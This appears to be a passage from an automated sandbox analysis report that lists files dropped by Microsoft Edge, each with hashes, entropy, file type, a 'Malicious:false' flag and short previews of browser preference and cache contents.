                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):23
                                                                                                                                                                                  Entropy (8bit):4.142914673354254
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Fdb+4Ll:Zl
                                                                                                                                                                                  MD5:3FD11FF447C1EE23538DC4D9724427A3
                                                                                                                                                                                  SHA1:1335E6F71CC4E3CF7025233523B4760F8893E9C9
                                                                                                                                                                                  SHA-256:720A78803B84CBCC8EB204D5CF8EA6EE2F693BE0AB2124DDF2B81455DE02A3ED
                                                                                                                                                                                  SHA-512:10A3BD3813014EB6F8C2993182E1FA382D745372F8921519E1D25F70D76F08640E84CB8D0B554CCD329A6B4E6DE6872328650FEFA91F98C3C0CFC204899EE824
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:........idb_cmp1......
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 9, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                  Entropy (8bit):2.090131332935168
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:ige+AGJjre8R3uWhnYuxiOKg71DmMXDh+MJ2MHAB8r0di55ODE:igZVVlLR9+MAMgB8rP
                                                                                                                                                                                  MD5:175FE6310DDCDAB8A57AEBF9CEEBC0F1
                                                                                                                                                                                  SHA1:D396E6ECE7B2880F5A03DC6A95C8E7D0363D850B
                                                                                                                                                                                  SHA-256:AA53EB01C8AAE12C935BFE28BFCB7462E72AE5A8F8DE14BDF5F1BA22B2735A6E
                                                                                                                                                                                  SHA-512:94B6DA4C470CC8BAD88FF727761509045287D9F209059886DC30358027DE2DC3C6E3FDAF3E268FFD4B03E351BC14BCAEA8F611CE266D4584EC0DE9E67E506251
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):9814
                                                                                                                                                                                  Entropy (8bit):5.1110850546346915
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:st+SkdPKCs/13aFvrE9kgD3+M8WvbV+Fd4AQUIpKJxUHhPcYJ:st+SIKCs/13CDGS0vbGdXQUCKJSHj
                                                                                                                                                                                  MD5:5F421375843091990F3F9C0096861E8A
                                                                                                                                                                                  SHA1:819E4C5D0ACE858B039CCB3A6E3278BF1CA34262
                                                                                                                                                                                  SHA-256:B84C01CC68EF42FA433B3007FAC39A409565B727AAB602D755438537DE6CF421
                                                                                                                                                                                  SHA-512:36DAE27BA07F4FBF43468C1FB08EC0DC197341335190047A84553D144C22619E870904C262F7C63B45C03F0ACE87F9469BD663013566FE7F734F518396BA073D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13352988565937492","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):24691
                                                                                                                                                                                  Entropy (8bit):5.567990619159357
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:V9ZxMjWfiW5wj2f4ji8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPySIH0gOrwXthUpcm:Vvmj8iWaj2fGiu1jaXf/Ldxtk
                                                                                                                                                                                  MD5:1D2CA0D90087B30A444E6AA0C683AC73
                                                                                                                                                                                  SHA1:D47B84BE54902C9AA23CC3DAF0C8B667948D4A5A
                                                                                                                                                                                  SHA-256:7A9BF8225C24B4399E6B69D18E13E45E3011A5C519A7CDA78733CB8BF957E110
                                                                                                                                                                                  SHA-512:F444E88B78CF821E681CFF9D583F2D80014D183E7D2D2FE5E478BD0E56CC89266AF4B75CA1B8F0C4016A4540B856A793092C276CB43843A50DB9DD7A1BD824CA
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13352988565277124","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13352988565277124","location":5,"ma
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):16144
                                                                                                                                                                                  Entropy (8bit):6.310925271546827
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:8GUcH1qEcbuCp3bkQspksx1AJdJw2NS2BX/vk5bSxSGtOHu+JEYA:8GNHrAILpks4NnX/I8tBgA
                                                                                                                                                                                  MD5:E245F475CAAC0A491A1C022EF6FAA4A3
                                                                                                                                                                                  SHA1:F7CA7E93F41D5DE85A3AB2F2A4CB84F68B403B45
                                                                                                                                                                                  SHA-256:ADBCFA29A2940E8A8CB6EE1598A5A087AEF1F2CB4F9BE79D74F0715A3F971CCE
                                                                                                                                                                                  SHA-512:656BA4230E717F162B43069EA935D8B44C0E12C485417B254D29F4250832325DB03CB3D9E1C5D37FA319DA977E7E9C599F9368409099878FB8929CD19B3AC735
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:0\r..m..........rSG.....0/** 7745184845366216933 */self.document = self; self.window = self;var ytcfg={d:function(){return window.yt&&yt.config_||ytcfg.data_||(ytcfg.data_={})},get:function(k,o){return k in ytcfg.d()?ytcfg.d()[k]:o},set:function(){var a=arguments;if(a.length>1)ytcfg.d()[a[0]]=a[1];else{var k;for(k in a[0])ytcfg.d()[k]=a[0][k]}}};.ytcfg.set({"EXPERIMENT_FLAGS":{"H5_enable_full_pacf_logging":true,"H5_use_async_logging":true,"ab_det_apb_b":true,"ab_det_el_h":true,"ab_det_fet_wr":true,"ab_det_fet_wr_en":true,"ab_det_gen_re":true,"action_companion_center_align_description":true,"allow_skip_networkless":true,"clear_user_partitioned_ls":true,"compress_gel":true,"csi_config_handling_infra":true,"deprecate_csi_has_info":true,"disable_child_node_auto_formatted_strings":true,"disable_pacf_logging_for_memory_limited_tv":true,"disable_simple_mixed_direction_formatted_strings":true,"disable_thumbnail_preloading":true,"embeds_transport_use_scheduler":true,"enable_ab_report_on_errorsc
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):10537
                                                                                                                                                                                  Entropy (8bit):5.815453556950212
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:lzNjX/ndpmwU3p2viL5kygCagEAFR7V0Z4awpoSzSDS6vThOcC:Xr/njmwU3p2NfgEAFR7V06awpo8wZrQN
                                                                                                                                                                                  MD5:09647CF5C1EEFF36F42A8CC1FFF65EDA
                                                                                                                                                                                  SHA1:D39BE5D87A0D8D2B45E3AFABD0ABEA68660F58F7
                                                                                                                                                                                  SHA-256:272BCAF48570014EE60AE0A5595256F858A76BCC09AE9133D4626D2AB6465723
                                                                                                                                                                                  SHA-512:C996C5280C2D4FBD349B56653D401F40D1083A6D0E8F77B761D6AC495C5D384227DBACB128D8F3C74A4360186E79A12B6B571ED5B6BDFCF9F7CA61331C379E78
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):164940
                                                                                                                                                                                  Entropy (8bit):5.629859160754584
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3072:QvX5Lw5UlDJVZHL08oy6CiEETgDAGXoY7xZSrnCvnxtsmEtn4DtATIcT3PY0At:QvX5LKUlDJVZHL08oyRiJsD7oYb/sHnw
                                                                                                                                                                                  MD5:B15EF10AB1B263DD903CF0AA4E2595D6
                                                                                                                                                                                  SHA1:C8E53DF596F2FC091A46C4B0181A33C54731CBCE
                                                                                                                                                                                  SHA-256:C4025F4007D69F7F07CD5607586E62D3D16E68C66844BC96CD652B79765BFDDB
                                                                                                                                                                                  SHA-512:9775B4000110F74889E29CF9DB5A3129B0160132DF4A395AF9F3E0AA6D1A487F7FB4CBDEB70D11EDECA2ECD0AF9F5E779DF319F3B8CC500EC1554FFFF541A8DB
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:0\r..m..........V.......1'use strict';var aa="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}.var ca=ba(this);function da(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&aa(c,a,{configurable:!0,writable:!0,value:b})}}.function ea(a){function b(d){return a.next(d)}.function c(d){return a.throw(d)}.return new Promise(function(d,e){function f(g){g.done?d(g.value):Promise.resolve(g.value).then(b,c).then(f,e)}.f(a.next())})}.function r(a){return ea(a())}.function fa(a,b){a instanceof String&&(a+="");var c=0,d=!1,e={next:funct
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):398769
                                                                                                                                                                                  Entropy (8bit):6.108365872630944
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6144:SIAYEibUrKT0knEC56j+vAg/crWxIxhPBPjzmw7kwI:vJEibUra96j+v3q/BPjzm6k9
                                                                                                                                                                                  MD5:045B754F9E9B35696DA853A9CC7D2012
                                                                                                                                                                                  SHA1:75CCA2A3B9BE15A0CFB7EB2B1BDB93CD0A98CE13
                                                                                                                                                                                  SHA-256:70A6618B693D8C7E59E7B19C5430EF45EAE652920FE4F7AC46C2A2D265F4AAFE
                                                                                                                                                                                  SHA-512:35E460E8EB75B3310191B8893E29BB5CEFFE0EFB81CAD955F4221F8FFC1AE0D690B16A9D463DE7A580C48E853B691D9C1BFA1910BDAA541834B8367D3E3FFF39
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):164940
                                                                                                                                                                                  Entropy (8bit):5.630157520028261
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3072:OvX5Lw5UlDJVZHL08oy6CiEETgDAGXoY7xZSrnCvnxtsmEtn4DtATIcT3PY0Ax:OvX5LKUlDJVZHL08oyRiJsD7oYb/sHn0
                                                                                                                                                                                  MD5:4118359994037A0D16DC5A6CD3BC3539
                                                                                                                                                                                  SHA1:E076C244EB8CC4D98183ADF6DEA84DC06D8DF708
                                                                                                                                                                                  SHA-256:C67597B03D7C74492916263712222C186E8FA05CA62A4722F4BE4A490146AD37
                                                                                                                                                                                  SHA-512:CEC64CD923EFAD46DCC33270683439FC3907D54337D7562904A3F94329DC5F8D7E22C15070123CDAF5B5E4CF9A2ED2D6070C4A094262679AF5DC3825233B44F7
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):398761
                                                                                                                                                                                  Entropy (8bit):6.109067507301838
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6144:C/bThfUNKKVKcgxumTvr4CIwllAC0svOf4jfkwH:CjThfUN9b9mTvdzzrvOf4zkE
                                                                                                                                                                                  MD5:3AD94E889FD7748A29B0D1F42F7DFEBA
                                                                                                                                                                                  SHA1:F73B1F5DB37652480EEBCC6968297F4E8876424D
                                                                                                                                                                                  SHA-256:79B8890771A0788FB4BBE9308F0B0A8C23A068FC4F60B5F0CD2D8F5425AB164F
                                                                                                                                                                                  SHA-512:8041CD09B2C6FD72D9ACBF2FD757F152686E53E992F202B519DA43E546B5974F5A618B3E05F7E9BD0A824C97301B9C682BD3348799572C954861C61C647CA899
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):16144
                                                                                                                                                                                  Entropy (8bit):6.312429469115441
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:qGUcH1qEcbuCp3bkQspksx1AJdJAS2H27X/vk5bSxSGtOHu+JEYj:qGNHrAILpksL87X/I8tBgj
                                                                                                                                                                                  MD5:74F857755872D3A533524F148B6438EE
                                                                                                                                                                                  SHA1:7CB70BEBB221B4CFC520EA9D4ACFBFDD9E363167
                                                                                                                                                                                  SHA-256:02FBF0232C2F1E632FDA15B2A0B6505D6B1351C1A2976A656D6235EA8611F360
                                                                                                                                                                                  SHA-512:5B7950C31B500340A2077E4D86FC03155F75A3C16FFCAEE8B0DED109FDB5E29FCB08AAB626C56C9E97CBBF0C2D523C20E7B4BAE23798BAAFE8666F939E3EED9D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):10537
                                                                                                                                                                                  Entropy (8bit):5.823496037525341
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:izNjXgnJ7Qpl5rdZ9Q7VGO9T/5eE21IDmJ0KlhhTLSSQSoSSSrCMA:SrgntQplZdgG0eE21IDmughhTLSHrkru
                                                                                                                                                                                  MD5:3A29486989EBF11F73DEEEC2BD21A71D
                                                                                                                                                                                  SHA1:2B3494B4425B368EF6D13717AF432D2BB6146F0C
                                                                                                                                                                                  SHA-256:648634777E579FC8D0116CE93E5A82245D87AE7160152713605BAB1BB8266646
                                                                                                                                                                                  SHA-512:EC6F1CE09BF5071DD519400081DBA84FDF2E4B5DD3BF7739AC71F9EB058523FFFF31AE480F493008FBA600E72C942291F1B4E7F2D986B67E8EC2E725F80BACE9
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):24
                                                                                                                                                                                  Entropy (8bit):2.1431558784658327
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:m+l:m
                                                                                                                                                                                  MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                  SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                  SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                  SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):96
                                                                                                                                                                                  Entropy (8bit):3.625814583693913
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:N7rPAR0q//ljf/tlWL6/tlkXg:RGl/GLuEg
                                                                                                                                                                                  MD5:70CCA2EA6413E159B0440619870CA870
                                                                                                                                                                                  SHA1:11DB00BF96A94AE453A41CA9E058CFF26F550731
                                                                                                                                                                                  SHA-256:1E43006B4739B0FC4CEAC6B3BEEB431CDA7E715F04B5BA223340953E2B51D3B7
                                                                                                                                                                                  SHA-512:67BD44DF9455169C21C62FD5CF5D88A3DF33866121B491374DB8B559FD4D73BED37E4A5CD357C0204F1FD47BB9D81A0434E53DE7A4DBB17911E3369F8569CE6C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):96
                                                                                                                                                                                  Entropy (8bit):3.625814583693913
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:N7rPAR0q//ljf/tlWL6/tlkXg:RGl/GLuEg
                                                                                                                                                                                  MD5:70CCA2EA6413E159B0440619870CA870
                                                                                                                                                                                  SHA1:11DB00BF96A94AE453A41CA9E058CFF26F550731
                                                                                                                                                                                  SHA-256:1E43006B4739B0FC4CEAC6B3BEEB431CDA7E715F04B5BA223340953E2B51D3B7
                                                                                                                                                                                  SHA-512:67BD44DF9455169C21C62FD5CF5D88A3DF33866121B491374DB8B559FD4D73BED37E4A5CD357C0204F1FD47BB9D81A0434E53DE7A4DBB17911E3369F8569CE6C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):96
                                                                                                                                                                                  Entropy (8bit):3.625814583693913
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:N7rPAR0q//ljf/tlWL6/tlkXg:RGl/GLuEg
                                                                                                                                                                                  MD5:70CCA2EA6413E159B0440619870CA870
                                                                                                                                                                                  SHA1:11DB00BF96A94AE453A41CA9E058CFF26F550731
                                                                                                                                                                                  SHA-256:1E43006B4739B0FC4CEAC6B3BEEB431CDA7E715F04B5BA223340953E2B51D3B7
                                                                                                                                                                                  SHA-512:67BD44DF9455169C21C62FD5CF5D88A3DF33866121B491374DB8B559FD4D73BED37E4A5CD357C0204F1FD47BB9D81A0434E53DE7A4DBB17911E3369F8569CE6C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                  Entropy (8bit):0.0018094250832613847
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2zEkl3:/M/xT02zn
                                                                                                                                                                                  MD5:7A1954FD7C04C94886D0BF53D3BF37A6
                                                                                                                                                                                  SHA1:CF3DAF1D528595BA13F8895440322F769861722A
                                                                                                                                                                                  SHA-256:1780FA1B6F6BD096BD57094EC2B0C571173EE1C461539DDA6F6C3E4D51663A91
                                                                                                                                                                                  SHA-512:7D6C4E289B2631D1ED47532A21E80237E8E6A90D64C312E010B9E28B4C073E64C3C169DB95C471180D7A9194355DD31666BCCF703A32232F6EF7264D2B1D879B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                  Entropy (8bit):0.0018094250832613847
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2zEkl8g:/M/xT02znj
                                                                                                                                                                                  MD5:9A03269CF5679CA69D9145212009C0E7
